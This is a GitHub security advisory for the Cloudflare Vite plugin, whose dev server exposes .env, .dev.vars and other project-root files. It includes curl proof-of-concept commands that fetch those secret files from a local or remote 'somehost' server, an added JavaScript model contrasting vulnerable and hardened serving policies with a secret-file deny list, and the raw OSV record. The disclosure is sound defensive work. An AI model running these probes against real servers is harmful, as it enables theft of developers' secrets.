GHSA-4pfg-2mw5-f8jx
Vulnerability from github
Published
2025-07-08 19:07
Modified
2025-09-19 15:35
Summary
Cloudflare Vite plugin exposes secrets over the built-in dev server
Details

Summary

Note: originally posted on H1 (https://hackerone.com/reports/3117837) but closed. Cross-posting over to here in an abundance of caution instead of a public issue.

When utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:

  • .env
  • .dev.vars

PoC

  1. Create a Workers project that utilises the @cloudflare/vite-plugin. For example:
     • npm create cloudflare@latest - select Framework Starter -> React
  2. Add any secret files to test if they're accessible. echo foobar=secret > .dev.vars for example
  3. Run npm run dev to start the dev server (after running npm ci if necessary to install dependencies) and then hit the following to expose information:

curl http://localhost:5173/.env may expose any secrets in this file
curl http://localhost:5173/.dev.vars may expose any secrets in this file
curl http://localhost:5173/package.json may expose dependencies used by the project, potentially leading to other vulnerabilities
curl http://localhost:5173/README.md may expose internal documentation

Impact

If the Vite dev server is exposed on a public network, for example when a user simply uses wrangler to serve their application instead of publishing it to Cloudflare for production, an attacker may be able to acquire secrets that the user does not wish to expose.

Another common scenario where this could happen is when sharing previews of an application using cloudflared. npm run dev -> share preview with cloudflared -> now all secrets are exposed to the public internet.

Binding the Vite dev server to every network interface, which exposes it in exactly this way, is possible via:

npm run dev -- -- --host 0.0.0.0

The default configuration has no reason to expose information outside of the configured assets directory.

Example:

curl http://somehost/.env may expose secrets
curl http://somehost/.dev.vars may expose secrets
curl http://somehost/package.json may expose dependencies used by the project, potentially leading to other vulnerabilities
curl http://somehost/README.md may expose internal documentation

etc.

The result is information disclosure to anyone on the same network or, if the dev server is exposed further such as via cloudflared, to the public internet, as explored here: https://github.com/cloudflare/workers-sdk/discussions/3455#discussioncomment-6165773
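The PoC above probes for files by URL, and the Impact section states the intended behaviour: nothing outside the configured assets directory should be reachable from the dev server. The following is an added example, not code from the advisory or from @cloudflare/vite-plugin, that models both sides in plain Node.js. It resolves request paths against a policy, first a policy that falls through from the assets directory to the whole project root (the exposure described above, modelled here as an assumption about a server's file lookup rather than as the plugin's actual code path), then a hardened policy scoped to an assumed ./public assets directory that also refuses dotfiles and applies a deny list in the spirit of Vite's server.fs.deny. The in-memory file tree, the probe list and the policy shape are constructed for the demonstration.

```javascript
// Added example, not code from the advisory or from @cloudflare/vite-plugin.
// Models how a dev server maps request paths onto files and contrasts two
// policies: one that falls back to the whole project root (the exposure the
// advisory describes) and one scoped to the configured assets directory with a
// deny list. The file tree, the "/public" assets directory and the policy
// shape are assumptions made for this demonstration.

// Constructed in-memory project tree standing in for a Workers project checkout.
const PROJECT_FILES = {
  "/.env": "API_KEY=supersecret",
  "/.dev.vars": "foobar=secret",
  "/package.json": '{"name":"demo","dependencies":{"react":"19.0.0"}}',
  "/README.md": "# internal notes",
  "/wrangler.jsonc": '{"assets":{"directory":"./public"}}',
  "/public/index.html": "<!doctype html><h1>hello</h1>",
  "/public/assets/app.js": "console.log('app');",
};

// Basenames a dev server should refuse even inside the assets directory
// (same idea as Vite's server.fs.deny; the matcher below is this example's own).
const DEFAULT_DENY = [".env", ".env.*", ".dev.vars", "*.pem", "*.crt", "*.key"];

// Translate a simple glob (only "*" is special) into an anchored RegExp.
function globToRegExp(glob) {
  const escaped = glob.replace(/[.+?^${}()|[\]\\]/g, "\\$&").replace(/\*/g, ".*");
  return new RegExp("^" + escaped + "$");
}

function matchesDeny(basename, patterns) {
  return patterns.some((p) => globToRegExp(p).test(basename));
}

// Decode the request path and collapse "." and ".." so that ".." can never
// climb above the served root. Throws URIError on malformed percent-encoding.
function normalizeUrlPath(urlPath) {
  const raw = decodeURIComponent(urlPath.split(/[?#]/)[0]);
  const segments = [];
  for (const seg of raw.split("/")) {
    if (seg === "" || seg === ".") continue;
    if (seg === "..") { segments.pop(); continue; }
    segments.push(seg);
  }
  return segments;
}

// Resolve a request against a policy { roots, allowDotfiles, deny }.
// Roots are tried in order; the first one holding the file answers 200.
function serve(files, urlPath, policy) {
  let segments;
  try {
    segments = normalizeUrlPath(urlPath);
  } catch {
    return { status: 400 };
  }
  if (segments.length === 0) segments = ["index.html"];
  // Refuse any dot-prefixed component (.env, .dev.vars, .git/config, ...).
  if (!policy.allowDotfiles && segments.some((s) => s.startsWith("."))) {
    return { status: 403 };
  }
  if (matchesDeny(segments[segments.length - 1], policy.deny)) {
    return { status: 403 };
  }
  for (const root of policy.roots) {
    const file = (root === "/" ? "" : root) + "/" + segments.join("/");
    if (Object.prototype.hasOwnProperty.call(files, file)) {
      return { status: 200, body: files[file] };
    }
  }
  return { status: 404 };
}

// The paths the advisory probes with curl, plus two traversal variants.
const PROBE_PATHS = [
  "/", "/index.html", "/assets/app.js",
  "/.env", "/.dev.vars", "/package.json", "/README.md", "/wrangler.jsonc",
  "/../.env", "/%2e%2e/.dev.vars",
];

// Which probe paths does a policy answer with 200?
function exposedPaths(files, policy) {
  return PROBE_PATHS.filter((p) => serve(files, p, policy).status === 200);
}

// Vulnerable: assets directory first, then fall through to the project root,
// dotfiles allowed and nothing denied.
const VULNERABLE = { roots: ["/public", "/"], allowDotfiles: true, deny: [] };
// Hardened: only the configured assets directory, dotfiles refused, deny list on.
const HARDENED = { roots: ["/public"], allowDotfiles: false, deny: DEFAULT_DENY };

console.log("vulnerable serves:", exposedPaths(PROJECT_FILES, VULNERABLE));
console.log("hardened serves:  ", exposedPaths(PROJECT_FILES, HARDENED));
```

Run with node. The hardened policy still serves /, /index.html and /assets/app.js, answers 403 for the dotfiles including the two traversal variants, and answers 404 for package.json, README.md and wrangler.jsonc because those simply do not exist under the assets root; scoping the root is what removes them, the deny list only backstops secrets that were copied into the assets directory by mistake. Against a real dev server the same probe list can be driven with the curl commands above, and a 200 for any of the dotfiles means the instance is serving the project root.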



{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "@cloudflare/vite-plugin"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.6.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-59427"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-200"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-07-08T19:07:47Z",
    "nvd_published_at": null,
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nNote: [originally posted on H1](https://hackerone.com/reports/3117837) but closed. Cross-posting over to here in abundance of caution instead of a public issue. \n\nWhen utilising the Cloudflare Vite plugin in its default configuration, all files are exposed by the local dev server, including files in the root directory that contain secret information such as:\n- `.env`\n- `.dev.vars`\n\n### PoC\n1. Create a Workers project that utilises the `@cloudflare/vite-plugin`. For example:\n   - `npm create cloudflare@latest` - select Framework Starter -\u003e React\n2. Add any secret files to test if they\u0027re accessible. `echo foobar=secret \u003e .dev.vars` for example\n3. Run `npm run dev` to start the dev server (after running `npm ci` if necessary to install dependencies) and then hit the following to expose information:\n\n`curl http://localhost:5173/.env` may expose any secrets in this file\n`curl http://localhost:5173/.dev.vars` may expose any secrets in this file\n`curl http://localhost:5173/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities\n`curl http://localhost:5173/README.md` may expose internal documentation\n\n### Impact\n\nIf the vite dev server is exposed on a public network, such as when a user simply uses `wrangler` to serve their application and doesn\u0027t publish to Cloudflare in production, an attacker may be able to acquire secrets that the user doesn\u0027t wish to be exposed. \n\nAnother common scenario where this could happen is when sharing previews of an application using `cloudflared`. \n`npm run dev` -\u003e share preview with `cloudflared` -\u003e now all secrets are exposed to the public internet.\n\nExposing via vite is possible via:\n\n```\nnpm run dev -- -- --host 0.0.0.0\n```\n\nThe default configuration has no reason to expose information outside of the configured assets directory.\n\nExample:\n\n`curl http://somehost/.env` may expose secrets\n`curl http://somehost/.dev.vars` may expose secrets\n`curl http://somehost/package.json` may expose dependencies used by the project, potentially leading to other vulnerabilities\n`curl http://somehost/README.md` may expose internal documentation\n\netc.\n\nInformation disclosure to anyone on the same network, or if the dev server is exposed such as via `cloudflared` as explored here: https://github.com/cloudflare/workers-sdk/discussions/3455#discussioncomment-6165773",
  "id": "GHSA-4pfg-2mw5-f8jx",
  "modified": "2025-09-19T15:35:01Z",
  "published": "2025-07-08T19:07:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-4pfg-2mw5-f8jx"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cloudflare/workers-sdk/commit/0e500720bf70016fa4ea21fc8959c4bd764ebc38"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cloudflare/workers-sdk"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Cloudflare Vite plugin exposes secrets over the built-in dev server"
}

